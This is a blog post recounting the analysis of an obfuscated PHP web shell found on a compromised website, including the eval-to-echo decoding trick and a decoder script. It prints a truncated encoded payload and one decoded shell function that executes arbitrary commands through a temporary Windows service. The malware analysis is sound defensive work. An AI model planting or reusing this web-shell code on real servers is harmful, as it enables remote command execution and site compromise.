Decode: eval_gzinflate_base64_decode

If you follow my posts….sometime back i wrote about the my encounter with web attacks which was amazing experience. I am lazy kinda person and with all this IPL fever these days, I don’t even think of blogging or doing personal research.

So what made me sit and write today?

The answer is,  my same old friend pinged me for help in one of his old web site maintenance project.  They found the website is making suspicious outbound connections and customers are receiving some junk emails from the domain. My friend was assigned to look into the issue. He asked for my help and i decided to jump inn to get dirty…

I asked him to get me all the suspicious looking files from the hosted web server for analysis and within few minutes he sent me some php files.

PHP file was filled with totally junk characters similar to following

eval(gzinflate(base64_decode('7b37QhtH8ij8P0/RniiLFEtCYOeGDA4GHHOCjRfwZnMwRxlpRjCLpFFmRmCv1+d9vmc4L/fVpa9zkQS2c9mfnV1b05fq6u7q6urq6qrauBPv
9S4fDn4KJ4Ot1a/+z5c64cv/89Vq9/H2yqPHNbvQxtbq/71X1ymNe/9XlXr+didJ/Le9kyyJJhe9n8K36ZZPKVfws17rHe///dX+yWmjO4wTUYfyh3E8PZhk4UWYbHW6bsKjrUE8m2
RWtdZ6rsj9+413OvusrP0zt8L5+VaaJb0knI78QVh3+tX01rzmLaE1uh+t+Y2m175D+++XHPof92897FilYsg ( cut for brevity)

Looking at the code, I realize this routine is definitely having malicious code. This was my first experience with php based de-obfuscation. I googled it a bit and got pointer to some php code used for decoding this gzinflate() routine. I download that file and realize not having  php-cli/php-cgi installed on my office debian box.

I quickly did “apt-get install php5-cli” and started PHP installation. In the meanwhile, I decided to apply java-script de-obfuscation knowledge and some common sense on this problem 😉

In JavaScript, we used use replace eval() with document.write() and in stead of running the code we used display decoded script using alert().

In PHP, i tried replacing eval() with echo() and guess what it worked like a charm 😉

After running the modified encoded php file, it decoded all the code and spit it on my stdout. I redirected it in file and started analyzing…

It was again a php code containing handful functions to achieve tasks like – mass mailing, dictionary attack, port scan, sql injection etc etc.

Here is one of the decoded function

function srvshelL($command){
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}

I tested the output of echo() trick with the php file downloaded from internet. It was same. Here is the php code used for decoding of eval(gzinflate(base64_decode()))) code.

<?php
/*
Taken from http://www.php.net/manual/de/function.eval.php#59862
Directions:
1. Save this snippet as decrypt.php
2. Save encoded PHP code in coded.txt
3. Create a blank file called decoded.txt (from shell do CHMOD 0666 decoded.txt)
4. Execute this script (visit decrypt.php in a web browser or do php decrypt.php in the shell)
5. Open decoded.txt, the PHP should be decrypted if not post the code on http://www.ariadoss.com/forums/web-development/lamp
*/

echo "\nDECODE nested eval(gzinflate()) by DEBO Jurgen <jurgen@person.be>\n\n";

echo "1. Reading coded.txt\n";

$fp1 = fopen ("coded.txt", "r");
$contents = fread ($fp1, filesize ("coded.txt"));
fclose($fp1);

echo "2. Decoding\n";

while (preg_match("/eval\(gzinflate/",$contents)) {
$contents=preg_replace("/<\?|\?>/", "", $contents);
eval(preg_replace("/eval/", "\$contents=", $contents));
}
echo "3. Writing decoded.txt\n";

$fp2 = fopen("decoded.txt","w");
fwrite($fp2, trim($contents));
fclose($fp2);
?>

Enjoy!!

Advertisements

About this entry